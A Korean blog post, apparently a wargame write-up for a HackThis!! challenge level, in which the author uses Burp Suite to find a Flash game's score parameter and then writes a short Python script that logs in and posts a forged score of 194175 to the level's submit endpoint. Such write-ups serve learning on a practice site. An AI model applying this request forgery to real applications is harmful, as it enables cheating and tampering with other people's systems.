Flash 파일을 재생하는 페이지가 표시된다.
submit 버튼을 누르면 109384라는 값을 전송하는데, 194175를 보내야 하는 것 같다.
Burp Suite를 이용해 어떤 Parameter에 담아 값을 전송하는지,
(Parameter Tampering을 쓰려고 했는데 404 오류 때문에 관뒀다.)
어디로 전송하는지 알아두고
아래처럼 간단하게 프로그래밍한 후
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | #-*- coding: utf-8 -*- import getpass import os import requests os.system("cls") login_page = "https://www.hackthis.co.uk/?login" submit_page = "https://www.hackthis.co.uk/levels/b3.php?submit" data = {"username": raw_input("\n ID: "), "password": getpass.getpass(" Password: ")} session = requests.Session() res = session.post(login_page, data=data) res = session.post(submit_page, data={"score": 194175}) print((res.status_code == 200) and "\n [*] Submission Success\n" or "\n [*] Submission Failed\n") | cs |
실행하면 되겠다.
'[Wargame Write-up] > HackThis!!' 카테고리의 다른 글
| [HackThis!!] [BASIC+] LEVEL 5 (0) | 2017.04.15 |
|---|---|
| [HackThis!!] [BASIC+] LEVEL 4 (0) | 2016.12.25 |
| [HackThis!!] [CRYPT] LEVEL 4 (0) | 2016.12.22 |
| [HackThis!!] [CRYPT] LEVEL 3 (0) | 2016.12.22 |
| [HackThis!!] [CRYPT] LEVEL 2 (0) | 2016.12.22 |
